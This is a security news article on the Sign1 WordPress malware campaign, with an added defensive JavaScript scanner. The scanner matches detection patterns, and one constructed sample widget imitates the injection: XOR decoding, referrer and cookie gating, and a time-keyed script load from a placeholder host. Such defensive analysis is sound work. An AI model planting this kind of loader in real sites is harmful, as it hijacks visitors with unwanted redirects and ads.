WordPress under siege: Sign1 malware will turn your site into an advertising billboard

Teacher

The wave of intrusive ads has already hit more than 39,000 websites.

Over the past six months, tens of thousands of websites have fallen victim to a large-scale campaign using the previously unknown Sign1 malware. Attackers inject malicious JavaScript into WordPress sites, and visitors are met with unwanted redirects and pop-up ads. The campaign was discovered by Sucuri, a web security firm, after one of its clients' sites started displaying this behaviour.

Having gained unauthorized access to a WordPress site, usually by brute-forcing credentials or exploiting vulnerabilities in plugins, the attackers inject their JavaScript into Custom HTML widgets, the legitimate Simple Custom CSS and JS plugin, or other components, rather than modifying the WordPress core files themselves. Because the injected code lives in the database alongside legitimate site content, a file-integrity check of the core installation will not reveal it.

The analysis showed that Sign1 uses a randomization mechanism based on the current time to continuously change the URLs from which its malicious scripts are loaded. These addresses rotate every 10 minutes, so a blocklist entry is stale almost as soon as it is published.

The domains involved are registered shortly before the attack and have not yet been blocklisted by the time they are used. The rotating URLs then fetch additional malicious code, which runs in the browser of anyone visiting the infected site.

To mask its presence, Sign1 uses XOR-based obfuscation and randomised variable names, and it checks cookies and the referrer before doing anything.

Sign1 inspects the traffic source and activates only if the visitor arrived from a major site such as the Google or Yahoo search engines or the Facebook or Instagram social networks. In all other cases the malware stays dormant; one consequence of this is that a site owner who opens the site directly, with no such referrer, never sees the pop-ups. In addition, the script sets a cookie in the visitor's browser so that the pop-up is shown only once per visitor for each site.
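The traits described in the last few paragraphs (an XOR-style decoder, a referrer gate on search engines and social networks, a once-per-visitor cookie, a loader URL derived from the current time) are also what a defender can look for in widget content. The following is an added example, not Sucuri's code and not code from the campaign: a heuristic scanner that pulls inline scripts out of WordPress Custom HTML widget content and scores them against those traits. The trait weights, the flag threshold, the `rotationSlot` model of the 10-minute rotation and both sample widgets are constructed assumptions for illustration; the "suspicious" sample only mimics the described structure and loads nothing real.

```javascript
// Added example, not code from Sucuri or from the Sign1 campaign: a
// heuristic scanner for JavaScript planted in WordPress Custom HTML
// widgets. Each <script> body is scored against the traits the write-up
// attributes to Sign1 (XOR-style decoding, a document.referrer gate, a
// once-per-visitor cookie marker, a time-derived loader URL). Weights,
// the flag threshold and the sample widgets are constructed assumptions.

const TRAITS = [
  { name: "xor_decode",         weight: 2, re: /String\.fromCharCode|charCodeAt\s*\([^)]*\)\s*\^/ },
  { name: "referrer_gate",      weight: 2, re: /document\.referrer/ },
  { name: "search_social_list", weight: 1, re: /google|yahoo|facebook|instagram/i },
  { name: "cookie_marker",      weight: 1, re: /document\.cookie/ },
  { name: "time_seed",          weight: 1, re: /Date\.now\s*\(\)|new\s+Date\s*\(\)|getTime\s*\(\)/ },
  { name: "dynamic_loader",     weight: 2, re: /createElement\s*\(\s*["']script["']\s*\)/ },
];
const FLAG_THRESHOLD = 5; // assumption: two strong traits plus one weak one

// Pull every inline <script> body out of a widget's HTML.
function extractScripts(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Score one script body: the matched trait names and their total weight.
function scoreScript(body) {
  const hits = TRAITS.filter((t) => t.re.test(body));
  return {
    score: hits.reduce((sum, t) => sum + t.weight, 0),
    traits: hits.map((t) => t.name),
  };
}

// Scan a list of { id, html } widgets; one result per script found.
function scanWidgets(widgets) {
  const results = [];
  for (const w of widgets) {
    extractScripts(w.html).forEach((body, i) => {
      const { score, traits } = scoreScript(body);
      results.push({ widget: w.id, script: i, score, traits, suspicious: score >= FLAG_THRESHOLD });
    });
  }
  return results;
}

// Model of the 10-minute rotation described above (an assumption about the
// exact derivation): the loader URL is keyed on a window index, so a
// blocklist entry captured in one window no longer matches in the next.
function rotationSlot(epochMs, windowMs = 10 * 60 * 1000) {
  return Math.floor(epochMs / windowMs);
}

// Constructed sample widgets: one benign, one shaped like the described injection.
const SAMPLE_WIDGETS = [
  {
    id: "widget_custom_html-2",
    html: '<p>Subscribe to our newsletter</p>\n<script>\n' +
      'if (document.cookie.indexOf("nl_dismissed=") < 0) { document.getElementById("nl").hidden = false; }\n' +
      '</script>',
  },
  {
    id: "widget_custom_html-7",
    html: '<script>\n' +
      'var _0x4f2a="constructed";\n' +
      'function _0x9b(s,k){var o="";for(var i=0;i<s.length;i++){o+=String.fromCharCode(s.charCodeAt(i)^k.charCodeAt(i%k.length));}return o;}\n' +
      'if(/google|yahoo|facebook|instagram/i.test(document.referrer)&&document.cookie.indexOf("_0x4f2a=")<0){\n' +
      ' var t=Math.floor(Date.now()/600000);\n' +
      ' var e=document.createElement("script");e.src="https://example.invalid/"+t+".js";document.head.appendChild(e);\n' +
      ' document.cookie="_0x4f2a=1";\n' +
      '}\n' +
      '</script>',
  },
];

function main() {
  for (const r of scanWidgets(SAMPLE_WIDGETS)) {
    console.log(`${r.widget} script#${r.script}: score=${r.score} ` +
      `${r.suspicious ? "SUSPICIOUS" : "ok"} [${r.traits.join(", ")}]`);
  }
}
main();
```

In practice the widget HTML would come from the site's database rather than from the inline samples, for example by exporting the `widget_custom_html` option with `wp option get widget_custom_html --format=json` and feeding each widget's content to `scanWidgets`; the same scoring applies to snippets saved by the Simple Custom CSS and JS plugin. The scores are a triage aid, not proof: a legitimate analytics tag can hit `time_seed` or `search_social_list`, which is why those carry low weight and why any flagged script should be read by hand.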

Once triggered, Sign1 redirects visitors to bogus pages with fake CAPTCHAs that trick them into allowing browser notifications. Once that permission is granted, the attackers have a direct channel for pushing unwanted ads to the desktop, even after the visitor has left the site.

Over the past six months, Sucuri's scanners have detected the malware on at least 39,000 sites. The latest wave alone, which began in January 2024, has already affected about 2,500 sites, which is why the campaign is drawing serious attention from security researchers.

To protect your sites from threats like this, experts recommend using long, complex passwords, keeping installed plugins and themes updated to their latest versions, and removing unused plugins and themes that can otherwise become a convenient entry point for intruders. For a site that has already been hit, the injection points named above (Custom HTML widgets and the snippets saved by the Simple Custom CSS and JS plugin) are the first places to inspect, and all administrator passwords should be changed once the injected code has been removed.